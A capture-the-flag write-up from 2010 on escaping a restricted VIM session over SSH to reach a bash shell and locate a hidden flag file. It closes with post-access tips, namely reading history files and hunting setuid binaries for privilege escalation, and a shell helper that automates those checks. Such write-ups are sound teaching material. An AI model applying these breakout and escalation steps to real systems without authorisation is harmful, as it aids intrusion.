Tuesday, July 13, 2010

smpCTF challenge #2 write-up

Challenge #2 was similar to defcon trivial 200: you had to escape from a VIM editor, but this time it was not evil, since you could actually see the screen.

We were given the following instructions:
ssh -l luser gordo.smpctf.com -p 2282
Password: smpctf
Help find waldo..

Once logged in over SSH, we land inside VIM. Again, thanks to defcon trivial 200 we know what to do:
:set shell=/bin/bash
:!/bin/bash

Then we have a shell:
bash-3.1$ id
uid=1005(luser) gid=103(levels) groups=103(levels)

From here, it's just exploration. We can start by using find:
bash-3.1$ find / -iname '*flag*' 2>/dev/null
[...]
/usr/lib/.flag
[...]

Hmm, what's this?
bash-3.1$ ls -l /usr/lib/.flag
drwxr-xr-x  2 root root  4096 Jul  9 12:30 /usr/lib/.flag
bash-3.1$ cd /usr/lib/.flag
bash-3.1$ ls -al
total 64
drwxr-xr-x  2 root root  4096 Jul  9 12:30 .
drwxr-xr-x 69 root root 53248 Jul  9 12:30 ..
-rw-r--r--  1 root root    54 Jul  9 16:33 smp
bash-3.1$ cat smp
Challenge Key: cfc6adcc
Flag: HAHAHAHAHAHAHHAHAponies
Got it!

If we hadn't found it this way, in such a situation we could have used:
  • recursive grep:
    grep -Hirn flag /
  • find setuid/setgid binaries for privilege escalation (-xdev keeps find on the local filesystem; GNU find has no -local predicate):
    find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l '{}' \;
  • see files that were last modified on the filesystem:
    ls -alRt / |head
  • reading ~/.bash_history and other history or log files
  • up to your imagination :)
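As an added example (not part of the original write-up), here is a small POSIX shell helper that performs two of the checks above the way an auditor would run them on a box: list setuid/setgid files, and list the most recently modified files sorted globally (ls -Rt only sorts within each directory, so piping it to head mostly shows the top-level entries). The function names and the sample tree are constructed for illustration; it assumes GNU find for -xdev and -printf.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes GNU find.

# List regular files with the setuid or setgid bit set under START (default /).
# -xdev stays on the starting filesystem so /proc, /sys and network mounts
# are not walked.
list_setuid_setgid() {
    start="${1:-/}"
    find "$start" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print the COUNT most recently modified regular files under START, sorted
# globally by mtime (newest first). %T@ prints seconds since the epoch.
recent_files() {
    start="${1:-/}"
    count="${2:-20}"
    find "$start" -xdev -type f -printf '%T@ %p\n' 2>/dev/null \
        | sort -rn | head -n "$count" | cut -d' ' -f2-
}

# Build a constructed sample tree so the helpers can be exercised without
# root privileges. Prints the tree root on stdout.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/bin" "$dir/lib/.hidden"
    printf 'plain\n' > "$dir/lib/.hidden/note"
    printf '#!/bin/sh\n' > "$dir/bin/helper"
    chmod 4755 "$dir/bin/helper"          # setuid bit: must be reported
    sleep 1                               # guarantee a distinct, newer mtime
    printf 'newest\n' > "$dir/lib/recent" # must come first in recent_files
    printf '%s\n' "$dir"
}

# Usage on a real host: list_setuid_setgid /  and  recent_files / 20
```

Because the mtime sort happens across the whole tree, recent_files surfaces things like a freshly dropped file in a hidden directory under /usr/lib, which ls -alRt would bury far down its per-directory output.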
